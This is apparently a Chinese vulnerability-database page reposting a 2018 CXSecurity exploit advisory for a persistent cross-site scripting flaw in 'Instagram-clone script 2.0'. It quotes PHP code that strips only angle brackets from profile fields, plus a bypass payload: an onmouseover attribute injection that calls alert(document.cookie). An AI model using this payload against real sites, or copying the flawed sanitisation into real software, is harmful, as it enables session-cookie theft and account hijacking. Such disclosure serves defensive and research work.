Instagram-clone script 2.0 - Persistent cross site scripting - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1215625 漏洞类型
发布时间 2018-07-08 更新时间 2018-07-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070095
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting 
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# Tested on: Kali linux
=================================================

# POC : Persistent Cross site scripting

# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
      $website = preg_replace("#[<>]#i", "", $_POST['website']);
      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
 $session = $_SESSION['id'];

      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
      $array = array("mssg" => $m);
      echo json_encode($array);
    }

# preg_replace() function replaces "<>" with null.
So we use this payload to bypass regex :
# Payload : "onmouseover=" alert(document.cookie)

=================================================